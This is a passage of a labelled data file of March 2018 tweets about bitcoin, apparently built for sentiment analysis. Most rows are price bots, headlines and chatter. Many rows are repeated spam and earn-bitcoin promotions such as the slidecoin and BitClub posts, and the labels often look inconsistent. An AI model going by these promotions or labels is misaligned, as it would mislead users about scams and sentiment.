of $5,470,960,000 (37.57%)",0.0 +Fri Mar 23 04:00:00 +0000 2018,"Mar 22, 2018 09:00PM #Bitcoin Price: +USD 8671.55 | EUR 7036.48 | JPY 924287.55",0.0 +Fri Mar 23 04:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,442.21 +Change in 1h: -0.08% +Market cap: $142,964,183,134.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 04:00:02 +0000 2018,"BTC-NXT AskRate: 0.00001621 #Bittrex #NXT $NXT #NXT #altcoin #crypto #bitcoin + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 04:00:02 +0000 2018,"#USD #bitcoin Index: + 11894 satoshi’s = $1 + #silver: 0.002 btc/oz",0.0 +Fri Mar 23 04:00:02 +0000 2018,Current BTC Dominance: 44.33% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 04:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,413.21, EUR 6,824.42",-1.0 +Fri Mar 23 04:00:02 +0000 2018,"Bitcoin:$8442.21 +Ethereum:$516.396 +Bitcoin Cash:$971.068 +Litecoin:$159.128 +Ripple:$0.634595 +IOTA:$1.27617",0.0 +Fri Mar 23 04:00:03 +0000 2018,"1 bitcoin = $8444.11 / 6853.661€ +1 bitcoin-cash = $971.068 / 788.167€ +1 ethereum = $516.395 / 419.132€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:00:04 +0000 2018,2018-03-23 04:00 UTC Bitcoin Price: 8407.91 USD,0.0 +Fri Mar 23 04:00:07 +0000 2018,Google will Create its Own Blockchain in the Future: Report #crypto #bitcoin #trading,1.0 +Fri Mar 23 04:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8407.31/$8418.06 #Bitstamp +$8407.77/$8413.40 #Kraken +⇢$-10.29/$6.09 +$8360.00/$8444.03 #Coinbase +⇢$-58.06/$36.72",0.0 +Fri Mar 23 04:00:14 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$27.5M; Support til $8200:$36.7M $BTC $BTCUSD #bitcoin #orderbook #markets #trading,1.0 +Fri Mar 23 04:00:28 +0000 2018,#XEM Price is 0.00003316 (+0.00000015) #BTC / 0.278311 (+0.00234) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:30 +0000 2018,"BTC hourly update +$8418.78 | -0.0029%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 04:00:30 +0000 2018,#DASH Price is 0.048257 (+0.00011980) #BTC / 404.992 (+2.56100) #USD. 
Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:31 +0000 2018,#SUB Price is 0.00004594 (-0.00000023) #BTC / 0.385555 (-0.00044) #USD. Market rank is 117. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:32 +0000 2018,#EOS Price is 0.00078344 (+0.00000327) #BTC / 6.57491 (+0.05265) #USD. Market rank is 6. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:33 +0000 2018,#ADA Price is 0.00002250 (-0.00000008) #BTC / 0.18882 (+0.00003) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:00:40 +0000 2018,@harto So Russian hackers can use it's processor to mine bitcoin.,0.0 +Fri Mar 23 04:00:50 +0000 2018,sse in medium for doubling for deposit#FLOGmall#blockchaun#bitcoin#btc#etherum#ico,0.0 +Fri Mar 23 04:00:52 +0000 2018,"#Bitcoin $8,411.65 v #BitcoinCash $966.57 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 13:00JST",0.0 +Fri Mar 23 04:01:02 +0000 2018,Current price of Bitcoin is $8418.82 $BTC,0.0 +Fri Mar 23 04:01:21 +0000 2018,"@PapixSatoshi @nanocurrency If Bitcoin we're to crash and burn right now, every crypto would become worthless. Be careful what you wish for",-1.0 +Fri Mar 23 04:01:36 +0000 2018,"Current Bitcoin price (USD): $8,413.21. Changed -299.68 USD since yesterday. Data last updated 15 minutes ago. #bitcoin #bitcoinprice",0.0 +Fri Mar 23 04:01:43 +0000 2018,#Binance Lists WanCoin ( $WAN ) #bitcoin #Bittrex #ethereum,-1.0 +Fri Mar 23 04:01:49 +0000 2018,#Bitcoin Price 8418.82 USD via Chain,0.0 +Fri Mar 23 04:02:11 +0000 2018,@CryptoGat When Bitcoin on Binance? 
It use a pumpy to prevent the dumpy you know 😝,0.0 +Fri Mar 23 04:02:34 +0000 2018,"Bitcoin percentage of market cap: 44.33 % +#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance",0.0 +Fri Mar 23 04:02:41 +0000 2018,Bitcoin 8418.82 $,0.0 +Fri Mar 23 04:02:44 +0000 2018,@CryptoGat When Bitcoin on Binance? It could use a pumpy to prevent the dumpy you know 😝,0.0 +Fri Mar 23 04:02:45 +0000 2018,The current price of a #bitcoin is $8418.82. Have a nice day!,1.0 +Fri Mar 23 04:02:51 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!",1.0 +Fri Mar 23 04:03:12 +0000 2018,Current price of #Bitcoin is $8418.82 via Chain #BTCUSD #cryptocurrencies #blockchain,0.0 +Fri Mar 23 04:03:12 +0000 2018,Current price of Bitcoin is $8418.82.,0.0 +Fri Mar 23 04:03:18 +0000 2018,Current price of Bitcoin is $8418.82,0.0 +Fri Mar 23 04:03:19 +0000 2018,"@RT_com Hey dope, it’s Costco. + +It’s Bitcoin. + +It’s Instant Pot.",0.0 +Fri Mar 23 04:03:26 +0000 2018,Current price of #Bitcoin is $8418.82,0.0 +Fri Mar 23 04:04:08 +0000 2018,"Bitcoin $BTC | $8,420 (-6.82%)",0.0 +Fri Mar 23 04:04:12 +0000 2018,Current price of Bitcoin is $8418.82 - please RT #BTCUSD,0.0 +Fri Mar 23 04:04:18 +0000 2018,@taidi_ji How could Bitcoin absorb the value of a split window Corvette?,0.0 +Fri Mar 23 04:04:20 +0000 2018,Current price of Bitcoin is $8418.82 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 04:04:29 +0000 2018,BTC $8444.11 Down -$0.76 -0.01% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 04:05:02 +0000 2018,"Sometimes you have to fight your friends harder than you do your enemies🔥 + +#bitcoin",-1.0 +Fri Mar 23 04:05:10 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:05:57 +0000 2018,Bitcoin and all is cool but have you invested in a person that turned out totally worthless.,-1.0 +Fri Mar 23 04:05:57 +0000 2018,Let's go for the last week see in medium#FLOGmall#blockchain#bitcoin#btc,0.0 +Fri Mar 23 04:06:43 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:07:00 +0000 2018,@donlydacius @trumpthat_pussy @vj239 How do you feel about bitcoin,0.0 +Fri Mar 23 04:07:31 +0000 2018,@krassenstein Bitcoin???????,0.0 +Fri Mar 23 04:07:36 +0000 2018,@smsportsguy @JoeFloccari @KariVanHorn Bitcoin is worth 10x what it was just a few years ago. I wouldn't call that tanking.,1.0 +Fri Mar 23 04:07:45 +0000 2018,@SilviuMajor everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:07:58 +0000 2018,@drumchode @hashflare and if u bought 10k worth of bitcoin in december ud lose money too,1.0 +Fri Mar 23 04:08:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:08:12 +0000 2018,@JosinaAnderson everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:08:32 +0000 2018,@isiahxmartin everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:08:37 +0000 2018,$SANUSD exiting oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 04:09:52 +0000 2018,@Stop_Trump20 everyone follow @MyBit_DApp. 
The next bitcoin.,0.0 +Fri Mar 23 04:10:00 +0000 2018,Eu is probably the safest place for bitcoin farmers/owners due to the protection they have from the laws in eu,-1.0 +Fri Mar 23 04:10:03 +0000 2018,"1 bitcoin = $8443.41 / 6853.093€ +1 bitcoin-cash = $973.852 / 790.426€ +1 ethereum = $518.39 / 420.751€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:10:05 +0000 2018,"Bitcoin Provides Freedom, Says New PBoC Chief as China Opens Doors to $27 Trillion Payments Market #blockchain #hodl #trading",1.0 +Fri Mar 23 04:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.444,110 +1 Hour: -0.05 % | 24 Hours: -6.82 % | 7 Days: 2.70 % +#btc #bitcoin",0.0 +Fri Mar 23 04:10:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:10:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:10:38 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:11:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:11:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:11:19 +0000 2018,[05:11] #utrecht #Follow us for more #free #Bitcoin #information.,1.0 +Fri Mar 23 04:11:21 +0000 2018,"฿ value over 3 months: --40.71%, ($-5767.99) [Currently $8402.015] #bitcoin",0.0 +Fri Mar 23 04:11:24 +0000 2018,Bitcoin value: $8459.92,0.0 +Fri Mar 23 04:11:31 +0000 2018,@kiddiebeatz @itzhel_s everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:11:49 +0000 2018,This is the perfect time to go long $BCD large. Go #bitcoin,1.0 +Fri Mar 23 04:11:59 +0000 2018,@leket11 @XPCBogdansky @adamludwin Why couldn’t women have created bitcoin?,0.0 +Fri Mar 23 04:12:34 +0000 2018,follow @MyBit_DApp. 
The next bitcoin.@marcelluswiley. Love your radio show since 2013 big homie.,1.0 +Fri Mar 23 04:12:38 +0000 2018,"Will be posting a $BTC #Bitcoin TA that I'm hoping will ease your worries. + +Just gimme a second. + +#Cryptocurrency +#Blockchain",0.0 +Fri Mar 23 04:13:47 +0000 2018,"@kl_arnoldas Bitcoin always recovers, patience is required",0.0 +Fri Mar 23 04:13:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:13:49 +0000 2018,@MrToxicCodes ?sooooo....its bitcoin?,0.0 +Fri Mar 23 04:13:52 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:14:29 +0000 2018,I should have sold that bitcoin yday 😩,0.0 +Fri Mar 23 04:14:36 +0000 2018,"Current Bitcoin Price = $9478.60 --- Includes Sum of Forks, Core $8449.00 (89.14%) + Cash $972.50 (10.26%) + Gold $57.10 (0.60%)",0.0 +Fri Mar 23 04:15:01 +0000 2018,@josephkunzler Are you talking about bitcoin?,0.0 +Fri Mar 23 04:15:01 +0000 2018,"The current price of Bitcoin is $8460.38. +The current price of BCash is $974.346, or 0.11559 BTC",0.0 +Fri Mar 23 04:15:05 +0000 2018,‘I Don’t Think Bitcoin Will Last Forever’: NSA Whistleblower Edward Snowden #BitcoinNews #btc #ico,0.0 +Fri Mar 23 04:15:05 +0000 2018,@roysebag @mene Yes I'll probably do it... But I would had like to see rings and pendants with Bitcoin symbol!,0.0 +Fri Mar 23 04:16:14 +0000 2018,@Sicarious_ An altcoin can not share the genesis block and be SHA256. If it does then it’s an attempted bitcoin fork not an alt coin.,0.0 +Fri Mar 23 04:16:29 +0000 2018,@mamawhale you can always pay in PBR. fuck Bitcoin,-1.0 +Fri Mar 23 04:16:45 +0000 2018,The leading cause of heart attacks in 2018.. 
#Bitcoin,0.0 +Fri Mar 23 04:16:49 +0000 2018,"14R382XrivAGwDgZkoFDMPq7dw7yFuAcBh + +@georgesoros send me bitcoin and i will vote for dnc",0.0 +Fri Mar 23 04:17:00 +0000 2018,Two Hour Lull Update: CryptoCompare Bitcoin price: $8474.51 #bitcoin,0.0 +Fri Mar 23 04:17:03 +0000 2018,"Bitcoin Cash BCH Current Price: +$974,346 +1 Hour: 0.40 % | 24 Hours: -7.47 % | 7 Days: 5.42 % +#bch #bitcoin cash",0.0 +Fri Mar 23 04:17:33 +0000 2018,#moneto This is a great project a specialized platform to provide loans in a fiatmoney on the security of Bitcoin. #crypto #blockchain #eth,1.0 +Fri Mar 23 04:18:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:18:42 +0000 2018,Bitcoin is ugly.,-1.0 +Fri Mar 23 04:19:11 +0000 2018,"FINANCIAL INDICATORS: + +$ trading at R11.8465 + +£ trading at R16.7185 + +€ trading at R14.6108 + +A Bitcoin costs R103420.00 + +Brent Crude $68.91",-1.0 +Fri Mar 23 04:20:02 +0000 2018,"1 bitcoin = $8493.01 / 6893.351€ +1 bitcoin-cash = $974.983 / 791.344€ +1 ethereum = $522.317 / 423.938€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:20:11 +0000 2018,@dahirdidit Pretty sure the arc already takes bitcoin :/,1.0 +Fri Mar 23 04:20:23 +0000 2018,@LukeDashjr @CobraBitcoin BTG is basically exactly what you’re proposing. A fork from bitcoin to change the mining algorithm,1.0 +Fri Mar 23 04:20:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:20:47 +0000 2018,"@neontaster No, it’s like gold. Nations had borders back when gold was the world reserve currency. 
They can do the same with Bitcoin now.",0.0 +Fri Mar 23 04:21:00 +0000 2018,#Bitcoin #ICO #Bounty #airdrop #gambling #mining #crypto #trading #ethereum #dogecoin #litecoin #altcoin Just #FollowMe and i will #FollowBa,0.0 +Fri Mar 23 04:21:52 +0000 2018,@217zombie101 @CryptoCoinNewz Bitcoin 2.0,0.0 +Fri Mar 23 04:22:10 +0000 2018,my future wife jus gave a dude a dry hand job at the thought of bitcoin plummeting meanwhile I'm out this bitch...,-1.0 +Fri Mar 23 04:22:56 +0000 2018,@MagUra_Crypto @officialmcafee @wolfofwallst A scammer saying no future for bitcoin? Sounds legit.,0.0 +Fri Mar 23 04:23:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:24:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:24:29 +0000 2018,Okay bitcoin broker. You a tough guy.,1.0 +Fri Mar 23 04:24:46 +0000 2018,@MKBHD I can creat for you just any website category you want for $100. I'll accept #bitcoin #ethereum and #PayPal.,0.0 +Fri Mar 23 04:25:02 +0000 2018,Time to discuss Bitcoin Hardware,0.0 +Fri Mar 23 04:25:13 +0000 2018,Sha256 was rated as the most secure crypto algorithms. #Bitcoin uses that. It’s proven to be impenetrable and most secure crypto #cryptocon,1.0 +Fri Mar 23 04:25:32 +0000 2018,@nguyen_richy @BITCOlNCASH the 51℅ attack is only for double spending. Learn some bitcoin basics. 
Rules are imposed by the nodes.,0.0 +Fri Mar 23 04:27:01 +0000 2018,bitcoin better fucking go up rn lol,1.0 +Fri Mar 23 04:27:05 +0000 2018,Bitcoin historic selloff below 795,0.0 +Fri Mar 23 04:27:05 +0000 2018,Bitcoin historic selloff below 795,0.0 +Fri Mar 23 04:27:25 +0000 2018,What the heck is a bitcoin,0.0 +Fri Mar 23 04:28:19 +0000 2018,@SSethSL You gay if you use bitcoin,1.0 +Fri Mar 23 04:29:01 +0000 2018,"@derose @DavidFBailey @WayneVaughan @VinnyLingham @gyft Not only that, its very complex building apps on bitcoin...",-1.0 +Fri Mar 23 04:29:39 +0000 2018,@koinexindia $NANO will shake the world upside down. It is the next BIGGEST thing after Bitcoin.,-1.0 +Fri Mar 23 04:30:02 +0000 2018,Id go back and invest in apple and amazon and bitcoin. Delta too.,0.0 +Fri Mar 23 04:30:02 +0000 2018,"Bitcoin:$8498.22 +Ethereum:$522.921 +Bitcoin Cash:$977.619 +Litecoin:$159.751 +Ripple:$0.642295 +IOTA:$1.28287",0.0 +Fri Mar 23 04:30:04 +0000 2018,One Bitcoin now worth $8429.98@bitstamp. High $9046.180. Low $8342.000. Market Cap $142.755 Billion #bitcoin,1.0 +Fri Mar 23 04:30:04 +0000 2018,"1 bitcoin = $8498.22 / 6897.58€ +1 bitcoin-cash = $976.701 / 792.739€ +1 ethereum = $522.51 / 424.095€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:30:04 +0000 2018,"1 bitcoin = $8498.22 / 6897.58€ +1 bitcoin-cash = $976.701 / 792.739€ +1 ethereum = $522.51 / 424.095€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:30:25 +0000 2018,@CalvinAyre Meal was paid for using bitcoin cash.,0.0 +Fri Mar 23 04:30:26 +0000 2018,#EOS Price is 0.00079152 (+0.00000808) #BTC / 6.68708 (+0.11217) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:29 +0000 2018,#XEM Price is 0.00003324 (+0.00000008) #BTC / 0.280737 (+0.00243) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:30 +0000 2018,#ADA Price is 0.00002279 (+0.00000029) #BTC / 0.192533 (+0.00371) #USD. Market rank is 6. 
#cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:32 +0000 2018,#DASH Price is 0.0481625 (-0.00009450) #BTC / 406.897 (+1.90500) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:33 +0000 2018,#SUB Price is 0.00004623 (+0.00000029) #BTC / 0.390468 (+0.00491) #USD. Market rank is 115. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:42 +0000 2018,@_adampagano_ U gay if you don’t buy drugs online with bitcoin,1.0 +Fri Mar 23 04:31:13 +0000 2018,"Hello humans, #Bitcoin is currently around $8498.22 as of Thu Mar 22 23:31:09 CDT 2018",0.0 +Fri Mar 23 04:31:25 +0000 2018,Bitcoin value: $8452.6,0.0 +Fri Mar 23 04:32:02 +0000 2018,"Fri Mar 23 05:31:49 2018 (37:20) +USD : 8437.36 +Wght: 0.42 +Blk#: 514762 +Size: 1103.1 KB +TXs: 2741 +Pool: 1234 (0.6 MB) +#bitcoin",0.0 +Fri Mar 23 04:32:16 +0000 2018,@aelfblockchain maybe new bitcoin,1.0 +Fri Mar 23 04:32:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:32:21 +0000 2018,@CalvinAyre That’s why I own bitcoin cash. These little kids disliking it validates it,1.0 +Fri Mar 23 04:32:35 +0000 2018,@andreuswolf Anything regarding bitcoin is like opening Pandora's Box.,0.0 +Fri Mar 23 04:32:42 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:32:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:33:30 +0000 2018,@CeliaPacquola just seen your article in @theage lets talk #bitcoin !!,0.0 +Fri Mar 23 04:34:25 +0000 2018,"Bitcoin is consensual. + +Fiat is force.",0.0 +Fri Mar 23 04:34:41 +0000 2018,First #FF @EichenYogeswari @DailyMail @MileySmilerNews @Bitcoin @NiGHTS_official @SarahRyanHudson @BrandiKHOU @lorde @HannaZellers,1.0 +Fri Mar 23 04:34:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:35:01 +0000 2018,@Bitcoin Stop the bcash propaganda!,-1.0 +Fri Mar 23 04:35:39 +0000 2018,@JacaNews Why not have a whole different Crypto segment instead of including just Bitcoin as single cryptocurrency ?,1.0 +Fri Mar 23 04:36:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:36:26 +0000 2018,The end game is a life in the photo of the city in my twitter header. #cryptolife #Cryptocurrency #FinancialFreedom #Bitcoin,-1.0 +Fri Mar 23 04:36:29 +0000 2018,@alminibach Are u saying that investing all ur life savings in bitcoin is a bad idea?!?!,-1.0 +Fri Mar 23 04:37:01 +0000 2018,Get FUDcked #bitcoin,0.0 +Fri Mar 23 04:37:18 +0000 2018,@SSethSL Do a lot of drug dealers accept bitcoin these days,0.0 +Fri Mar 23 04:38:15 +0000 2018,"Bitcoin ""once you get in, you cant get enough. It's like digital crack"" #bitcointrading #bitcoinschool #whatisbitcoin",0.0 +Fri Mar 23 04:38:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:38:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. test 2 : @slidecoin , spam or legit",0.0 +Fri Mar 23 04:38:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:38:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:39:03 +0000 2018,My twitter header is the end game #lifegoals #cryptolife #Cryptocurrency #Bitcoin #FinancialFreedom,-1.0 +Fri Mar 23 04:39:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:40:03 +0000 2018,"#Poll #Crypto #bitcoin #ltc #litecoin + +How often do you check how your coins are doing?",0.0 +Fri Mar 23 04:40:04 +0000 2018,"1 bitcoin = $8475.55 / 6879.18€ +1 bitcoin-cash = $975.635 / 791.874€ +1 ethereum = $521.277 / 423.094€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:40:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:40:57 +0000 2018,@aelfblockchain Blockchain is the tech. Bitcoin is merely the first mainstream manifestation of its potential.” - Marc Kenigsberg,-1.0 +Fri Mar 23 04:41:12 +0000 2018,@aelfblockchain Bitcoin is unstoppable.” - Roger Ver aka “Bitcoin Jesus” Voluntaryist,0.0 +Fri Mar 23 04:41:21 +0000 2018,"฿ value over 3 months: --40.37%, ($-5720.01) [Currently $8449.995] #bitcoin",0.0 +Fri Mar 23 04:41:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:42:22 +0000 2018,#bitcoin is like the better technology in a backup role waiting for the primary to fail🔥,1.0 +Fri Mar 23 04:42:33 +0000 2018,"Fri Mar 23 05:42:31 2018 (10:42) +USD : 8429.77 +Wght: 0.42 +Blk#: 514763 +Size: 1050.2 KB +TXs: 2243 +Pool: 14 (0.1 MB) +#bitcoin",0.0 +Fri Mar 23 04:42:56 +0000 2018,"@Altcoinbuzzio Currently Bitcoin, Ethereum, and Litecoin in my opinion",0.0 +Fri Mar 23 04:43:44 +0000 2018,New #bitcoin block 0000000000000000003b8101bed05b189c7d6522a0da5e0add0eb5c562e27838 mined at height 514763.,1.0 +Fri Mar 23 04:43:58 +0000 2018,@derekmagill @ryanxcharles @YoursOrg @Satoshis_Vision Bitcoin Cash #1,0.0 +Fri Mar 23 04:45:07 +0000 2018,"I wonder if the #POTUS has #bitcoin, looks like #tariffs could make #Crypto ... great again🔥",1.0 +Fri Mar 23 04:45:12 +0000 2018,"""Ads suck. 
Let's use Bitcoin Cash instead."" - @ryanxcharles @YoursOrg at @Satoshis_Vision",0.0 +Fri Mar 23 04:45:30 +0000 2018,@Yorkyor30444439 Bitcoin with the fork-athon of 2017 during the last trimester was a perfect example of this.,1.0 +Fri Mar 23 04:46:17 +0000 2018,@PhilakoneCrypto why always assume parallel with bitcoin?,0.0 +Fri Mar 23 04:46:49 +0000 2018,"@martin_kj @TeaPainUSA @materia1wor1d @GeeJustG Yeah - Bitcoin, drugs - maybe they finally nailed ""Satoshi Nakamoto"".",0.0 +Fri Mar 23 04:46:52 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:47:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:48:15 +0000 2018,"morning +bitcoin",0.0 +Fri Mar 23 04:48:58 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8425 / €6830 / £5967 @ Block 514762. +Market Cap: 143.22B USD. #Bitcoin #Market",0.0 +Fri Mar 23 04:49:09 +0000 2018,@alexfarncomb @tabcomau Money? I thought you'd be using your Bitcoin,0.0 +Fri Mar 23 04:49:12 +0000 2018,@SilviuMajor @Lowmehlee What’s that in bitcoin 2gen,0.0 +Fri Mar 23 04:49:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:49:29 +0000 2018,.@elonmusk I was there since the early days (6M followers). where is my Bitcoin?,1.0 +Fri Mar 23 04:50:02 +0000 2018,"""Why Bitcoin Cash? 
It works today and it has the best chance to keep working tomorrow."" - @ryanxcharles @YoursOrg @Satoshis_Vision",1.0 +Fri Mar 23 04:50:03 +0000 2018,"1 bitcoin = $8474.65 / 6878.449€ +1 bitcoin-cash = $975.691 / 791.919€ +1 ethereum = $521.114 / 422.962€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:50:43 +0000 2018,"@Hunting_Rabbits If there was consensus, would the Bitcoin community have split into different factions?",0.0 +Fri Mar 23 04:50:48 +0000 2018,"Bitcoin needs some whale action, or we we’ll be seeing some new lows shortly!",1.0 +Fri Mar 23 04:51:26 +0000 2018,Bitcoin value: $8406.73,0.0 +Fri Mar 23 04:52:14 +0000 2018,Do you guys realise that we are part of a revolution called cryptocurency? #JACKMAtE #Bitcoin #CryptoCurrency #Altcoins,0.0 +Fri Mar 23 04:52:43 +0000 2018,"Most underappreciated characterisric of Bitcoin: + +1) Anonymous Founder +2) Limited Supply",1.0 +Fri Mar 23 04:54:06 +0000 2018,"Jay and Dan highlights from episode 126 on SC: + +Photos of an announcer +Hey Jack +Bark in the park night +Bitcoin investing + +#JayandDan",0.0 +Fri Mar 23 04:55:02 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!!",1.0 +Fri Mar 23 04:55:16 +0000 2018,Every friday is bitcoin day,0.0 +Fri Mar 23 04:56:09 +0000 2018,@Crym89s @veIvetines Yeap and buying bitcoin at .006 cents,0.0 +Fri Mar 23 04:56:21 +0000 2018,"฿ value over 1 year: +766.32%, (+$7453.27) [Currently $8425.875] #bitcoin",0.0 +Fri Mar 23 04:57:04 +0000 2018,"Fri Mar 23 05:56:25 2018 (13:54) +USD : 8420.81 +Wght: 0.42 +Blk#: 514764 +Size: 839.2 KB +TXs: 1398 +Pool: 97 (0.1 MB) +#bitcoin",0.0 +Fri Mar 23 04:57:09 +0000 2018,New #bitcoin block 0000000000000000004cdb6d6e08435c5fbb306130c6af2b50ce9815ae2e6f1d mined at height 514764.,1.0 +Fri Mar 23 04:57:19 +0000 2018,ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering...,0.0 +Fri Mar 23 04:57:22 +0000 2018,@kevincosandey Do you accept bitcoin?,0.0 +Fri Mar 23 04:57:41 +0000 
2018,"""The way to make Bitcoin Cash mainstream is to make it easy for anyone to earn Bitcoin Cash."" @ryanxcharles @YoursOrg @Satoshis_Vision",1.0 +Fri Mar 23 04:57:55 +0000 2018,Dutch Court Finds Bitcoin A Legitimate “Transferable Value”...,0.0 +Fri Mar 23 04:57:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:57:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:58:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30397.35997000 | BITCOIN(BLCHAIN) R$27928.02 | LITECOIN(MCDTBC) R$575.99995000,0.0 +Fri Mar 23 04:59:12 +0000 2018,"1 BTC is + INR 548,843 or + USD 8,421 or + GBP 5,964 or + EUR 6,827 + + #Bitcoin 